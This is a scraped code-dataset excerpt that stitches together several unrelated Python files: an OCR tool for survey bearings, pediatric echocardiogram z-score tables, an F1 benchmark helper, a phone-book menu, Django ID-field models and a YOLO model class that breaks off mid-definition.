search1(text, regex, description, resultdict):\n # declared a variable, store the result later\n result = \"\"\n # regular expression\n # The 'r' in front tells Python the expression is a raw string. \n # search the text using regex \n # Two ways \n\n # to comment out in VS use command+? \n # loop from the result text, using the pattern of the regex, the third independent varaible is for non-case sensititve\n # m = re.search(regex, text, re.IGNORECASE)\n # if m is None:\n # messagebox.showinfo(message='can not find any result')\n # else:\n # messagebox.showinfo(message='find result')\n\n \n for matches in re.finditer(regex, text, re.IGNORECASE):\n \n # convert current match to dictionary \n gd = matches.groupdict() \n isduplicated = False\n for pos, text in resultdict.items(): \n if pos > 0 and -pos in resultdict.keys(): \n if matches.start() >= pos and matches.end() <= pos + resultdict[-pos]:\n isduplicated = True \n \n\n if isduplicated:\n continue \n #messagebox.showinfo(message = str(gd))\n\n dir1 = ''\n # it will show a messagebox from tkinter \n if matches.group('dir1') is None :\n messagebox.showinfo(message='dir1 is none')\n else:\n #messagebox.showinfo(message =matches.group(\"dir1\"))\n dir1 = dirDict[matches.group('dir1').lower()]\n \n degrees = ''\n if matches.group('degrees') is None :\n messagebox.showinfo(message='degrees is none')\n else:\n #messagebox.showinfo(message =matches.group(\"degrees\"))\n degrees = matches.group('degrees')\n \n # minutes = ''\n # if matches.group('minutes') is None :\n # messagebox.showinfo(message='minutes is none')\n # else:\n # #messagebox.showinfo(message =matches.group(\"minutes\"))\n # minutes = matches.group('minutes')\n # debug \n \n minutes = ''\n if \"minutes\" in gd:\n #messagebox.showinfo(message= matches.group(\"minutes\"))\n minutes = matches.group('minutes')\n if minutes is None:\n minutes = \"00\"\n else:\n #messagebox.showinfo(message =\"doesn't have minutes\")\n minutes = \"00\"\n\n seconds = ''\n if \"seconds\" in gd:\n #messagebox.showinfo(message= matches.group(\"seconds\"))\n seconds = matches.group('seconds')\n if seconds is None:\n seconds = \"00\"\n else:\n messagebox.showinfo(message =\"doesn't have seconds\")\n seconds = \"00\"\n \n dir2 = ''\n if matches.group('dir2') is None :\n messagebox.showinfo(message='dir2 is none')\n else:\n dir2 = dirDict[matches.group('dir2').lower()]\n #messagebox.showinfo(message = dir2)\n \n\n feet = ''\n if matches.group('feet') is None :\n messagebox.showinfo(message='feet is none')\n else:\n feet = matches.group('feet')\n #messagebox.showinfo(message = \"feet is: \" + feet)\n\n resultdict[matches.start()] = \"DD \" + dir1 + degrees + \"-\" + minutes + \"-\" + seconds + dir2 + \" \" + feet + '\\n'\n \n #result = result + \"DD \" + dir1 + degrees + \"-\" + minutes + \"-\" + seconds + dir2 + \" \" + feet + '\\n'\n #messagebox.showinfo(message= \"result is: \" + result)\n\n # delete to avoid duplication prints \n \n # insert the result to the text box\n #result = description + '\\n' + \"*******\"+ \"\\n\"+ result+\"\\n\"\n #textResult.insert(tk.END, result)\n\ndef searchall(text):\n textResult.delete(1.0, tk.END)\n\n resultdict = dict()\n\n # search curve \n searchcurve(text, r\"(?Pradius)(?:.|\\n)*?(?P\\d+.?\\d+?.?\\d+?)\\W+feet(?:.|\\n)*?(?Pleft|right)(?:.|\\n)*?(?PSouth|North|West|East)\\W+(?P\\d+)\\W+degrees?\\W+((?P\\d+)\\W+minutes?\\W+)?((?P\\d+)\\W+seconds?\\W+)?(?PSouth|North|West|East)(?P(?:.|\\n)*?\\((?:.|\\n)*?\\))?(?:.|\\n)*?(?P\\d+.?\\d+?.?\\d+?)\\W+feet\", \n \"\"\"Curve 
direction: Format 1 : # it will tell you if it turns to the left or to the right \"\"\", resultdict)\n\n # search DD \n search1(text, r\"\\W+(?PSouth|North|West|East)\\W+(?P\\d+)\\W+degrees?\\W+((?P\\d+)\\W+minutes?\\W+)?((?P\\d+)\\W+seconds?\\W+)?(?PSouth|North|West|East)(?P(?:.|\\n)*?\\((?:.|\\n)*?\\))?(?:.|\\n)*?(?P\\d+.?\\d+?.?\\d+?)\\W+feet\", \n \"Format1-A: North/East/South/West 00 Degrees 00 Minutes 00 Seconds North/East/South/West 00.00 feet\", resultdict)\n search1(text, r\"\\W+(?PSouth|North|West|East)\\W+(?P\\d+)\\W+degrees?\\W+((?P\\d+)\\W+minutes?\\W+)?((?P\\d+)\\W+seconds?\\W+)?(?PSouth|North|West|East)(?:.|\\n)*?(?P\\d+.?\\d+)\\W+feet\",\n \"Format1-A does not deal with ()\", resultdict)\n search1(text, r\"\\W+(?PNorth|South|West|East)\\W+(?:.|\\n)*?\\((?P\\d+.?\\d+?)?\\)\\W+?degrees?(?:.|\\n)*?\\((?P\\d+.?\\d+?)?\\)\\W+?minutes?((?:.|\\n){1,16}\\((?P\\d+.?\\d+?)?\\)\\W+seconds)?\\W+(?PNorth|South|West|East)\\W+(?:(?:.|\\n)*?\\((?P\\d+.?\\d+.?\\d+?)?\\))\\W+feet\",\n \"Format1-B North/East/South/West (00) degrees (00) minutes (00) seconds North/East/South/West Two Hundred Forty-two and Twenty-three Hundredths (242.23) feet\", resultdict)\n search1(text, r\"\\W+(?PSouth|North|West|East)\\W+(?P\\d+)\\W+deg?\\W+((?P\\d+)\\W+min?\\W+)?((?P\\d+)\\W+sec?\\W+)?(?PSouth|North|West|East)(?P(?:.|\\n)*?\\((?:.|\\n)*?\\))?(?:.|\\n)*?(?P\\d+.?\\d+)\\W+feet\",\n \"Format1-C: North/East/South/West 00 deg 00 min 00 sec North/East/South/West\", resultdict)\n search1(text, r\"\\W+(?PSouth|North|West|East)\\W+(?P[0-9]?[0-9])\\W+?(?P[0-9]?[0-9])\\W+?(?P[0-9]?[0-9])\\W+?(?PSouth|North|West|East)(?:.|\\n)*?(?P\\d+(?:\\.|\\,)?\\d+?(?:\\.|\\,)?(\\d+)?).*?\\W+feet\",\n \"\"\"Format 2 North/East/South/West 00°00’00’’ North/East/South/West\"\"\", resultdict)\n search1(text, r\"\\W+(?PSouth|North|West|East)\\W+(?P[0-9]?[0-9])\\W+?(?P[0-9]?[0-9])\\W+?(?P[?0-9]?[?0-9])?\\W+?(?PSouth|North|West|East)(?:.|\\n)*?(?P\\d+\\d+\\W?\\d+).*?(feet|ft)\", \n \"Format 2 does not deal with ()\", resultdict)\n search1(text, r\"\\W+(?PS|N|W|E)\\W+(?P[0-9]?[0-9])\\W+?(?P[0-9]?[0-9])\\W+?(?P[?0-9]?[?0-9])?\\W+?(?PS|N|W|E)(?P(?:.|\\n)*?\\((?:.|\\n)*?\\))?(?:.|\\n)*?(?P\\d+.?\\d+)\\W+feet\",\n \"\"\"Format 3-A N/E/S/W 00°00’00’’ N/E/S/W feet \"\"\", resultdict)\n search1(text, r\"\\W+(?PS|N|W|E)\\W+(?P[0-9]?[0-9])\\W+?(?P[0-9]?[0-9])\\W+?(?P[?0-9]?[?0-9])?\\W+?(?PS|N|W|E)(?P(?:.|\\n)*?\\((?:.|\\n)*?\\))?(?:.|\\n)*?(?P\\d+.?\\d+)\\W+feet\",\n \"\"\"Format 3-B N/E/S/W 00°00’00’’ N/E/S/W feet \"\"\", resultdict)\n search1(text, r\"\\W+(?PSouth|North|West|East)\\W+(?P\\d+)\\W+degrees?\\W(?P[0-9]?[0-9])?\\W+?(?P[0-9]?[0-9])?\\W+?(?PSouth|North|West|East)(?:.|\\n)*?(?P\\d+.?(\\d+)?\\.?(\\d+)?)\",\n \"\"\"Format 4-A North/East/South/West 00 degrees 00’00’’ North/East/South/West\"\"\", resultdict)\n search1(text, r\"\\W+(?PS|N|W|E)\\W+(?P\\d+)\\W+degrees?\\W(?P[0-9]?[0-9])?\\W+?(?P[0-9]?[0-9])?\\W+?(?PS|N|W|E)(?:.|\\n)*?(?P\\d+\\W?\\d+\\W+\\d+)\",\n \"\"\"Format 4-B N/E/S/W 00 degrees 00’00’’ N/E/S/W\"\"\", resultdict)\n \n newdict = sorted(resultdict.keys()) \n for position in newdict: \n if position >= 0:\n\n # result = str(position) + \": \" + resultdict[position] \n result = resultdict[position] \n textResult.insert(tk.END, result)\n\ndef imgps():\n #try:\n temp_path = os.getcwd() + \"/temp.png\" # Current folder path\n\n im = ImageGrab.grabclipboard() # Get image from clipboard\n im.save(temp_path, format='PNG') # save image to temp folder\n \n \n loadedImage = ImageTk.PhotoImage(im) # load image from temp folder\n 
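# --- illustrative sketch, not part of the original dataset record ---
# Every pattern passed to searchcurve/search1 relies on named groups:
# re.finditer walks the OCR text and matches.groupdict() exposes each
# captured piece by name. Reduced example on one bearing call, with a
# simplified pattern in the same style as the ones above:
import re

sample = "thence North 12 degrees 30 minutes 15 seconds East 100.55 feet"
pattern = (r"(?P<dir1>North|South|East|West)\W+(?P<degrees>\d+)\W+degrees?"
           r"\W+(?P<minutes>\d+)\W+minutes?\W+(?P<seconds>\d+)\W+seconds?"
           r"\W+(?P<dir2>North|South|East|West)\W+(?P<feet>\d+\.?\d*)\W+feet")
m = re.search(pattern, sample, re.IGNORECASE)
print(m.groupdict())
# {'dir1': 'North', 'degrees': '12', 'minutes': '30', 'seconds': '15',
#  'dir2': 'East', 'feet': '100.55'}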
imageLabel.config(image=loadedImage) # set image to label\n imageLabel.image = loadedImage # save reference to image in memory\n # imageLabel.clipboard_clear() # clear clipboard\n\n text = pytesseract.image_to_string(Image.open(temp_path))\n \n #messagebox.showinfo(message=\"so far so good\")\n textOcr.delete(1.0, tk.END)\n textOcr.insert(tk.END, text)\n\n searchall(text)\n \n # messagebox.showinfo(message=text)\n\n # os.remove(temp_path) # delete temp file\n\n #except:\n #messagebox.showinfo(message=\"Clipboard is Empty Or Some Exception Occured.\")\n\n\ndef traverse_file(): # when you convert to text \n # get the text from the text box, \n # set the value to input value \n # extract information from the input value \n # https://tkdocs.com/tutorial/text.html\n inputValue = textOcr.get(\"1.0\",\"end-1c\")\n #messagebox.showinfo(message=inputValue)\n searchall(inputValue)\n\nbutton = tk.Button(mainWindow, text=\"Recognize\", command=imgps)\nbutton.grid(row=1, column=0, sticky='nsew')\n\nbuttonconvert = tk.Button(mainWindow, text=\"Convert to Traverse\", command=traverse_file)\nbuttonconvert.grid(row=1, column=1, sticky='nsew')\n\nmainWindow.mainloop()","repo_name":"KathySu/webRecognize","sub_path":"PDFtoTXTcurveformat1-A.py","file_name":"PDFtoTXTcurveformat1-A.py","file_ext":"py","file_size_in_byte":14145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"13929504808","text":"# !/usr/bin/env python\n\nfrom __future__ import division\nimport math\n\nrequired = ['bsa']\nbsaMethod = 'Haycock'\n\nconstraints = {'age': [0, '18y']}\n\nname = 'Lopez et al., Circ Cardiovasc Imaging 2017'\ndescription = 'Z-scores for Two Dimensional Echocardiographic Measurements Indexed to BSA using an Allometric Model'\n\ndetail = '''This is the data from the Pediatric Heart Network 'Echo Z-Score Project', a multi-year\n multi-institutional project, ultimately evaluating over 3200\npatients ≤ 18 years.\n\n>BSA raised to a specified power is a good parameter for cardiovascular allometric scaling, and none of the\nZ score models for the measurements in this study were affected by age, sex, race, or ethnicity.\n\n'''\ncritique = {\n 'model': 'allometric index',\n 'subjects': 3215,\n}\n\nyear = '2017'\ncitation = {\n 'title': 'Relationship of Echocardiographic Z Scores Adjusted for Body Surface Area to Age, Sex, Race, and Ethnicity.',\n 'authors': '''Lopez L, Colan S, Stylianou M, Granger S, Trachtenberg F, Frommelt P, Pearson\nG, Camarda J, Cnota J, Cohen M, Dragulescu A, Frommelt M, Garuba O, Johnson T,\nLai W, Mahgerefteh J, Pignatelli R, Prakash A, Sachdeva R, Soriano B, Soslow J,\nSpurney C, Srivastava S, Taylor C, Thankavel P, van der Velde M, Minich L;\nPediatric Heart Network Investigators''',\n 'journal': 'Circ Cardiovasc Imaging. 2017 Nov;10(11). 
',\n 'url': 'https://www.ncbi.nlm.nih.gov/pubmed/29138232'\n}\n\n\nclass Base(object):\n '''\n This is the base class for the Lopez/PHN data.\n The basic form of these equations is values indexed to BSA using an allometric exponent:\n z = [ ( parameter / BSA ^ x ) - mean value of indexed parameter ] / sd of indexed parameter\n '''\n\n def __init__(self, data, pt, limit):\n self.source = name\n self.citation = citation\n self.siteName = data['name']\n self.refName = 'lopez_circimaging_2017'\n self.exponent = data['exp']\n self.imean = data['mean'] # the indexed mean\n self.isd = data['sd'] # the indexed sd\n self.limit = limit\n self.bsaMethod = bsaMethod\n self.bsa = pt.bsa(bsaMethod)\n self.score = float(getattr(pt, data['name']))\n self.constraints = constraints\n self.critique = critique\n self.exceptions = ['mv_area', 'tv_area', 'lmca', 'lad', 'prox_rca',\n 'lv_eda_psax', 'lv_eda_epi_psax', 'lvedv', 'lvedv_epi',\n 'lvm_2d', 'lv_mass_vol_ratio', 'lvpw_lvedd_ratio',\n 'lv_sphere_idx'] # do not convert as mm to cm\n\n\n def mean(self):\n indexedMean = self.imean\n actualMean = indexedMean * math.pow(self.bsa, self.exponent)\n actualMean = actualMean if self.siteName in self.exceptions else actualMean * 10\n return actualMean\n\n\n def zscore(self):\n score = self.score if self.siteName in self.exceptions else self.score/10\n mean = self.imean\n sd = self.isd\n\n try:\n return (score / math.pow(self.bsa, self.exponent) - mean) / sd\n except:\n return None # property of object 'pt' does not exist\n\n def uln(self):\n iLimit = self.imean + self.limit * self.isd\n actualLimit = iLimit * math.pow(self.bsa, self.exponent)\n actualLimit = actualLimit if self.siteName in self.exceptions else actualLimit * 10\n return actualLimit\n\n def lln(self):\n iLimit = self.imean - self.limit * self.isd\n actualLimit = iLimit * math.pow(self.bsa, self.exponent)\n actualLimit = actualLimit if self.siteName in self.exceptions else actualLimit * 10\n return actualLimit\n\n\n\n#\n# individual site data\n#\n\nmvd_ap = {'name': 'mvd_ap', 'exp': 0.50, 'mean': 2.31, 'sd': 0.24}\nmvd_l = {'name': 'mvd_l', 'exp': 0.50, 'mean': 2.23, 'sd': 0.22}\nmv_area = {'name': 'mv_area', 'exp': 1.00, 'mean': 4.06, 'sd': 0.68}\ntvd_ap = {'name': 'tvd_ap', 'exp': 0.50, 'mean': 2.36, 'sd': 0.28}\ntvd_l = {'name': 'tvd_l', 'exp': 0.50, 'mean': 2.36, 'sd': 0.29}\ntv_area = {'name': 'tv_area', 'exp': 1.00, 'mean': 4.39, 'sd': 0.83}\naov = {'name': 'aov', 'exp': 0.50, 'mean': 1.48, 'sd': 0.14}\nsov = {'name': 'sov', 'exp': 0.50, 'mean': 2.06, 'sd': 0.18}\nstj = {'name': 'stj', 'exp': 0.50, 'mean': 1.69, 'sd': 0.16}\naao = {'name': 'aao', 'exp': 0.50, 'mean': 1.79, 'sd': 0.18}\nprox_arch = {'name': 'prox_arch', 'exp': 0.50, 'mean': 1.53, 'sd': 0.23}\ndist_arch = {'name': 'dist_arch', 'exp': 0.50, 'mean': 1.36, 'sd': 0.19}\nisthmus = {'name': 'isthmus', 'exp': 0.50, 'mean': 1.25, 'sd': 0.18}\nlmca = {'name': 'lmca', 'exp': 0.45, 'mean': 2.95, 'sd': 0.57}\nlad = {'name': 'lad', 'exp': 0.45, 'mean': 1.90, 'sd': 0.34}\nprox_rca = {'name': 'prox_rca', 'exp': 0.45, 'mean': 2.32, 'sd': 0.55}\npv = {'name': 'pv', 'exp': 0.50, 'mean': 1.91, 'sd': 0.24}\npv_plax = {'name': 'pv_plax', 'exp': 0.50, 'mean': 2.01, 'sd': 0.28}\nmpa = {'name': 'mpa', 'exp': 0.50, 'mean': 1.82, 'sd': 0.24}\nrpa = {'name': 'rpa', 'exp': 0.50, 'mean': 1.07, 'sd': 0.18}\nlpa = {'name': 'lpa', 'exp': 0.50, 'mean': 1.10, 'sd': 0.18}\nlvedd_psax = {'name': 'lvedd_psax', 'exp': 0.45, 'mean': 3.89, 'sd': 0.33}\nlvpwd_psax = {'name': 'lvpwd_psax', 'exp': 0.40, 'mean': 0.57, 'sd': 
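# --- illustrative sketch, not part of the original dataset record ---
# The allometric model implemented by Base.zscore in one line: divide the
# measurement by BSA**exponent, then standardize against the indexed
# mean/SD. Worked example for the aortic valve annulus (aov: exp 0.50,
# mean 1.48, sd 0.14), with a hypothetical patient; scores arrive in mm
# and are converted to cm for non-exception sites:
import math

bsa = 1.0           # m^2
measured_mm = 16.0  # aov annulus diameter

exp, mean, sd = 0.50, 1.48, 0.14
z = ((measured_mm / 10.0) / math.pow(bsa, exp) - mean) / sd
print(round(z, 2))  # 0.86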
0.09}\nivsd_psax = {'name': 'ivsd_psax', 'exp': 0.40, 'mean': 0.58, 'sd': 0.09}\nlv_maj_ed_a4c = {'name': 'lv_maj_ed_a4c', 'exp': 0.45, 'mean': 6.31, 'sd': 0.46}\nlv_maj_epi_ed_a4c = {'name': 'lv_maj_epi_ed_a4c', 'exp': 0.45, 'mean': 6.87, 'sd': 0.45}\nlv_eda_psax = {'name': 'lv_eda_psax', 'exp': 0.90, 'mean': 11.91, 'sd': 1.89}\nlv_eda_epi_psax = {'name': 'lv_eda_epi_psax', 'exp': 0.90, 'mean': 20.00, 'sd': 2.59}\nlvedv = {'name': 'lvedv', 'exp': 1.3, 'mean': 62.02, 'sd': 11.94}\nlvedv_epi = {'name': 'lvedv_epi', 'exp': 1.3, 'mean': 113.14, 'sd': 17.85}\nlvm_2d = {'name': 'lvm_2d', 'exp': 1.25, 'mean': 53.02, 'sd': 9.06}\nlv_mass_vol_ratio = {'name': 'lv_mass_vol_ratio', 'exp': 0, 'mean': 0.88, 'sd': 0.16}\nlvpw_lvedd_ratio = {'name': 'lvpw_lvedd_ratio', 'exp': 0, 'mean': 0.15, 'sd': 0.03}\nlv_sphere_idx = {'name': 'lv_sphere_idx', 'exp': 0, 'mean': 1.63, 'sd': 0.17}\n\nsites = [\n 'mvd_ap',\n 'mvd_l',\n 'mv_area',\n 'tvd_ap',\n 'tvd_l',\n 'tv_area',\n 'aov',\n 'sov',\n 'stj',\n 'aao',\n 'prox_arch',\n 'dist_arch',\n 'isthmus',\n 'lmca',\n 'lad',\n 'prox_rca',\n 'pv',\n 'pv_plax',\n 'mpa',\n 'rpa',\n 'lpa',\n 'ivsd_psax',\n 'lvedd_psax',\n 'lvpwd_psax',\n 'lv_maj_ed_a4c',\n 'lv_maj_epi_ed_a4c',\n 'lv_eda_psax',\n 'lv_eda_epi_psax',\n 'lvedv',\n 'lvedv_epi',\n 'lvm_2d',\n 'lv_mass_vol_ratio',\n 'lvpw_lvedd_ratio',\n 'lv_sphere_idx'\n]\n","repo_name":"parameterz/parameterz-main","sub_path":"calcs/echo/lopez_circimaging_2017.py","file_name":"lopez_circimaging_2017.py","file_ext":"py","file_size_in_byte":6610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"40883256318","text":"# algorithms for benchmarking node performance\n\nfrom sklearn.metrics import f1_score\nimport numpy as np\nimport scipy.sparse as sp\n\n\ndef evaluate_oracle_F1(probs, Y_real):\n\n y_test = [[] for _ in range(Y_real.shape[0])]\n cy = sp.csr_matrix(Y_real).tocoo()\n for i, b in zip(cy.row, cy.col):\n y_test[i].append(b)\n top_k_list = [len(l) for l in y_test]\n assert Y_real.shape[0] == len(top_k_list)\n predictions = []\n for i, k in enumerate(top_k_list):\n probs_ = probs[i, :]\n a = np.zeros(probs.shape[1])\n labels_tmp = probs_.argsort()[-k:]\n a[labels_tmp] = 1\n predictions.append(a)\n predictions = np.matrix(predictions)\n\n micro = f1_score(Y_real, predictions, average='micro')\n macro = f1_score(Y_real, predictions, average='macro')\n return (micro, macro)\n","repo_name":"SkBlaz/py3plex","sub_path":"py3plex/algorithms/general/benchmark_classification.py","file_name":"benchmark_classification.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":153,"dataset":"github-code","pt":"60"} +{"seq_id":"69887579711","text":"from import_data import import_data\nfrom export_data import export_data\nfrom print_data import print_data\nfrom print_name import print_name\n\n\ndef greeting():\n print(\"Телефонный справочник!\")\n\n\ndef input_data():\n id = input(\"Введите ID контакта: \")\n first_name = input(\"Введите имя: \")\n last_name = input(\"Введите фамилию: \")\n phone_number = input(\"Введите номер телефона: \")\n comment = input(\"Введите комментарий: \")\n\n return [id, first_name, last_name, phone_number, comment]\n\n\ndef choice_sep():\n sep = input(\"Введите разделитель ' ' или ',': \")\n if sep != \" \" and sep != \",\":\n sep = choice_sep()\n return sep\n\n\ndef choice_todo():\n print(\"Доступные операции с телефонной книгой:\\n\\\n 1 - Импорт;\\n\\\n 2 - Экспорт;\\n\\\n 3 - Имя, Фамилия.\")\n ch 
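# --- illustrative sketch, not part of the original dataset record ---
# The "oracle" part of evaluate_oracle_F1: for each node the true label
# count k is known, so the k highest-probability classes are taken as the
# prediction instead of thresholding. Minimal one-row example:
import numpy as np

probs = np.array([0.1, 0.6, 0.3, 0.8])  # class scores for one node
k = 2                                   # the node truly has two labels
pred = np.zeros_like(probs)
pred[probs.argsort()[-k:]] = 1          # keep the top-k classes
print(pred)  # [0. 1. 0. 1.]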
= input(\"Введите цифру: \")\n if ch == '1':\n sep = choice_sep()\n import_data(input_data(), sep)\n elif ch == '2':\n data = export_data()\n print_data(data)\n elif ch == '3':\n data = export_data()\n print_name(data)\n","repo_name":"MizenkoEugen/Homework_py","sub_path":"Seminar_7/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"37301048039","text":"from tkinter import *\nfrom PIL import ImageTk,Image\n\nroot = Tk()\nroot.title(\"Frame gui\")\nroot.geometry('300x300')\n\nframe=LabelFrame(root,text=\"Welcome!\",bg=\"yellow\",padx=20,pady=30)\nframe.pack(padx=10, pady=10)\n\nbtn=Button(frame,text=\"this is a button\",bg=\"crimson\")\nbtn.grid(row=0,column=0,padx=5,pady=5)\n\nbtn1=Button(frame,text=\"this is a button1\",bg=\"red\")\nbtn1.grid(row=1,column=0,padx=5,pady=5)\n\n\n\nroot.mainloop()","repo_name":"nahidhasan007/Python-","sub_path":"status bar.py","file_name":"status bar.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"14244304743","text":"import typing\nimport uuid\n\nfrom django.conf import settings\nfrom django.core.exceptions import ImproperlyConfigured\nfrom django.db import models\nfrom django.db.models import fields\nfrom django.urls import reverse\n\nimport utils\n\n\nclass IDField(fields.UUIDField, fields.DateTimeCheckMixin):\n \"\"\"\n A cross of UUIDField and DateTimeField meant to use as a pk.\n\n Can be auto_now/auto_now_add like DateTimeField, uses UUID\n format like UUIDField and uses a sortable generator for DB efficiency.\n \"\"\"\n def __init__(\n self, verbose_name: typing.Union[str, None] = None,\n auto_now: bool = False, auto_now_add: bool = False,\n node: int = 0, namespace: int = 0, extra: int = 0,\n **kwargs: typing.Any,\n ):\n self.auto_now, self.auto_now_add = auto_now, auto_now_add\n self.node = node\n self.namespace = namespace\n self.extra = extra\n if auto_now or auto_now_add:\n kwargs['editable'] = False\n kwargs['blank'] = True\n super().__init__(verbose_name, **kwargs)\n\n def pre_save(self, model_instance: models.Model, add: bool) -> uuid.UUID:\n if self.auto_now or (self.auto_now_add and add):\n value = utils.seq_uuid(\n node=self.node or getattr(settings, 'NODE_ID', 0),\n namespace=self.namespace or getattr(self.model, 'namespace_id', 0),\n extra=self.extra,\n )\n setattr(model_instance, self.attname, value)\n return value\n return super().pre_save(model_instance, add)\n\n\nclass IDModel(models.Model):\n # ID namespace, preferably should be different for every model (1 unsigned byte).\n namespace_id = 0 # maybe xor model name or something by default?\n # (Not foolproof but still more variation than default zero everywhere)\n lookup_field = 'uid' # Not DRY but easier than checking routers every time\n pk_url_kwarg = 'uid' # Attempt to mimic django class-based views, unfinished\n default_url_namespace = 'api1'\n uid = IDField(\n auto_now_add=True,\n primary_key=True,\n )\n mid = IDField(\n auto_now=True,\n db_index=True,\n )\n is_active = models.BooleanField(\n default=True,\n help_text='Soft-delete',\n )\n\n class Meta:\n abstract = True\n\n def __str__(self) -> str:\n key = getattr(self, self.lookup_field)\n return f'{self._meta.model_name}: {key}'\n\n def get_url(self, namespace: str = '') -> str:\n \"\"\"\n Kinda like the usual get_absolute_url but better.\n\n Get some values from the model class 
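# --- illustrative sketch, not part of the original dataset record ---
# The point of IDField's "sortable generator" is B-tree locality: new
# primary keys land at the right edge of the index instead of on random
# pages. The project's utils.seq_uuid is not shown in this record; a
# minimal stand-in with the same property (an assumption, not the
# project's implementation) could pack a timestamp into the high bits:
import time
import uuid


def sortable_uuid() -> uuid.UUID:
    ts = int(time.time() * 1e6) & ((1 << 64) - 1)  # microsecond timestamp, high 64 bits
    rand = uuid.uuid4().int & ((1 << 64) - 1)      # random low 64 bits
    return uuid.UUID(int=(ts << 64) | rand)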
so we don't have to\n override this for every single new model.\n I like a shorter method name for this and optional argument\n provides forward compatibility with other api versions.\n \"\"\"\n if not namespace:\n namespace = self.default_url_namespace\n try:\n if namespace:\n # E.g. if namespace=api1 and pattern_name_api1=viewname return api1:viewname\n pattern_name = ':'.join([\n namespace,\n getattr(self, f'pattern_name_{namespace}'),\n ])\n else:\n # Not namespaced version, just in case (I like namespaces)\n pattern_name = self.pattern_name\n except AttributeError as exc:\n raise ImproperlyConfigured(exc)\n key = getattr(self, self.lookup_field)\n return reverse(pattern_name, kwargs={self.lookup_field: key})\n\n def get_absolute_url(self) -> str:\n \"\"\"\n For compatibility with 3rd-party tools.\n \"\"\"\n return self.get_url()\n\n\nclass SlugMixin(models.Model):\n \"\"\"\n Popular additions to many models but not all.\n \"\"\"\n lookup_field = 'slug'\n slug_field = 'slug'\n slug_url_kwarg = 'slug'\n name = models.CharField(\n max_length=128,\n )\n slug = models.SlugField(\n max_length=128,\n unique=True,\n )\n\n class Meta:\n abstract = True\n","repo_name":"IvanAnishchuk/pizzeria_dangelo","sub_path":"utils/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"2032366489","text":"import torch\nimport torch.nn as nn\n\nfrom nets.ConvNext import ConvNeXt_Small, ConvNeXt_Tiny\nfrom nets.CSPdarknet import C3, Conv, CSPDarknet\nfrom nets.Swin_transformer import Swin_transformer_Tiny\nfrom pygcn.models import GCN\n\nimport numpy as np\n\n# SE\n# class SELayer(nn.Module):\n# def __init__(self, channel, reduction=16):\n# super(SELayer, self).__init__()\n# self.avg_pool = nn.AdaptiveAvgPool2d(1)\n# self.fc = nn.Sequential(\n# nn.Linear(channel, channel // reduction, bias=False),\n# nn.ReLU(inplace=True),\n# nn.Linear(channel // reduction, channel, bias=False),\n# nn.Sigmoid()\n# )\n#\n# def forward(self, x):\n# b, c, _, _ = x.size()\n# y = self.avg_pool(x).view(b, c)\n# y = self.fc(y).view(b, c, 1, 1)\n# return x * y.expand_as(x)\n\n\n#---------------------------------------------------#\n# yolo_body\n#---------------------------------------------------#\nclass YoloBody(nn.Module):\n def __init__(self, anchors_mask, num_classes, phi, adj, backbone='cspdarknet', pretrained=False, input_shape=[640, 640]):\n super(YoloBody, self).__init__()\n depth_dict = {'s' : 0.33, 'm' : 0.67, 'l' : 1.00, 'x' : 1.33,}\n width_dict = {'s' : 0.50, 'm' : 0.75, 'l' : 1.00, 'x' : 1.25,}\n dep_mul, wid_mul = depth_dict[phi], width_dict[phi]\n\n base_channels = int(wid_mul * 64) # 64\n base_depth = max(round(dep_mul * 3), 1) # 3\n #-----------------------------------------------#\n # 输入图片是640, 640, 3\n # 初始的基本通道是64\n #-----------------------------------------------#\n self.backbone_name = backbone\n self.num_classes = num_classes\n self.adj = adj\n\n if backbone == \"cspdarknet\":\n #---------------------------------------------------# \n # 生成CSPdarknet53的主干模型\n # 获得三个有效特征层,他们的shape分别是:\n # 80,80,256\n # 40,40,512\n # 20,20,1024\n #---------------------------------------------------#\n self.backbone = CSPDarknet(base_channels, base_depth, phi, pretrained)\n else:\n #---------------------------------------------------# \n # 如果输入不为cspdarknet,则调整通道数\n # 使其符合YoloV5的格式\n #---------------------------------------------------#\n self.backbone = {\n 'convnext_tiny' : ConvNeXt_Tiny,\n 
'convnext_small' : ConvNeXt_Small,\n 'swin_transfomer_tiny' : Swin_transformer_Tiny,\n }[backbone](pretrained=pretrained, input_shape=input_shape)\n in_channels = {\n 'convnext_tiny' : [192, 384, 768],\n 'convnext_small' : [192, 384, 768],\n 'swin_transfomer_tiny' : [192, 384, 768],\n }[backbone]\n feat1_c, feat2_c, feat3_c = in_channels \n self.conv_1x1_feat1 = Conv(feat1_c, base_channels * 4, 1, 1)\n self.conv_1x1_feat2 = Conv(feat2_c, base_channels * 8, 1, 1)\n self.conv_1x1_feat3 = Conv(feat3_c, base_channels * 16, 1, 1)\n \n self.upsample = nn.Upsample(scale_factor=2, mode=\"nearest\")\n\n self.conv_for_feat3 = Conv(base_channels * 16, base_channels * 8, 1, 1)\n self.conv3_for_upsample1 = C3(base_channels * 16, base_channels * 8, base_depth, shortcut=False)\n\n self.conv_for_feat2 = Conv(base_channels * 8, base_channels * 4, 1, 1)\n self.conv3_for_upsample2 = C3(base_channels * 8, base_channels * 4, base_depth, shortcut=False)\n\n self.down_sample1 = Conv(base_channels * 4, base_channels * 4, 3, 2)\n self.conv3_for_downsample1 = C3(base_channels * 8, base_channels * 8, base_depth, shortcut=False)\n\n self.down_sample2 = Conv(base_channels * 8, base_channels * 8, 3, 2)\n self.conv3_for_downsample2 = C3(base_channels * 16, base_channels * 16, base_depth, shortcut=False)\n\n # 80, 80, 256 => 80, 80, 3 * (5 + num_classes) => 80, 80, 3 * (4 + 1 + num_classes)\n # self.yolo_head_P3_box = nn.Conv2d(base_channels * 4, len(anchors_mask[2]) * (5 + num_classes), 1)\n self.yolo_head_P3_box = nn.Conv2d(base_channels * 4, len(anchors_mask[2]) * 4, 1)\n self.yolo_head_P3_cls = 